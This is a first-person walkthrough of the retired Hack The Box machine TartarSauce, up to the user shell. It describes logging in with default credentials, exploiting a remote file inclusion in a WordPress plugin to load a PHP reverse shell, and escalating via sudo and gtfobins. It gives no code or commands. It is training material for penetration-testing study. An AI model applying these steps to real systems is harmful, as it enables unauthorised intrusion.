Hackthebox Walkthrough — TartarSauce1 (User Shell)
Being taking the PWK courses and preparing for the OSCP exam recently. I got inspired a lot from many Hackthebox machines besides the pwk labs. So I decided to start writing some hackthebox retired machines walkthroughs (inspired from hackingarticles, infosec, ippsec’s youtube videos and etc, thanks for all of these amazing materials of Penetration Testing!)
Target: 10.10.10.88
Local IP:10.10.14.2
Nmap Enumeration
Nmap reveals only port 80 is open. Server banner : Apache httpd 2.4.18
we also discover the robots.txt
let’s try each one of these hidden directories
So we see only /webservices/monstra-3.0.4 works that has a valid web page
We always want to do directories fuzzing for web page. Let’s use gobuster this time to see if there are any hidden pages.
immediately we found a /wp wordpress page
Let’s check that out
Unfortunately nothing interesting on that page
Let’s focus on the Tartarsauce page
Try log in as Username: admin Password:admin (default)
And we successfully logged in ! Let’s try to see where we could upload a reverse shell
Looks like most items are read only
Run wpscan for more enumeration
searchsploit for the gwolle and we found a remote file inclusion vulnerability
Let’s create a php reverse shell and start our apache2 server
since we found out that the web server is appending wp-load.php at the end
So let’s change our file to wp-load.php
set up the netcat listener
and we found we got a reverse shell back
Let’s work on privilege escalation now!
Run linuxprivchecker.py and LinEnum.sh on /tmp
and we found this seems interesting that we can pwn the sudo privilege
And two users are running on the machine : onuma and root
Google the gtfobins and we found a shell command that could break out from restricted environments by spawning an interactive system shell
and we are onuma now
grab our user.txt flag!
But we still need to work on getting root privilege
To be Continue …
